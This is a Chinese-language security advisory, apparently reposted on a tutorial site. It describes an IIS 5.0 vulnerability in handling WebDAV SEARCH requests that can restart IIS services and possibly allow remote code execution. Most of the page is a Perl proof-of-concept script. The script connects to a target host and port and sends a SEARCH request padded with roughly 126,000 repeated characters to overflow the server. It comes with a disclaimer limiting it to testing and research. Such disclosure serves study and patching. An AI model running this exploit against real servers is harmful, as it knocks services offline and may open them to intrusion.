明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

IIS 處理 SEARCH 請(qǐng)求漏洞

[摘要]涉及程序: IIS 描述: 通過構(gòu)造特殊的 SEARCH 請(qǐng)求導(dǎo)致 IIS 執(zhí)行攻擊者代碼漏洞 詳細(xì): 發(fā)現(xiàn) IIS 在處理 SEARCH 請(qǐng)求時(shí)存在漏洞,攻擊者通過提交構(gòu)造特殊的 IIS ...
涉及程序:
IIS
  
描述:
通過構(gòu)造特殊的 SEARCH 請(qǐng)求導(dǎo)致 IIS 執(zhí)行攻擊者代碼漏洞
  
詳細(xì):
發(fā)現(xiàn) IIS 在處理 SEARCH 請(qǐng)求時(shí)存在漏洞,攻擊者通過提交構(gòu)造特殊的 IIS SEARCH 請(qǐng)求能重啟與 IIS 相關(guān)的所有服務(wù),而且可能遠(yuǎn)程執(zhí)行任意代碼。

以下代碼僅僅用來測(cè)試和研究這個(gè)漏洞,如果您將其用于不正當(dāng)?shù)耐緩秸?qǐng)后果自負(fù)



Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE
("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

受影響系統(tǒng):
IIS 5.0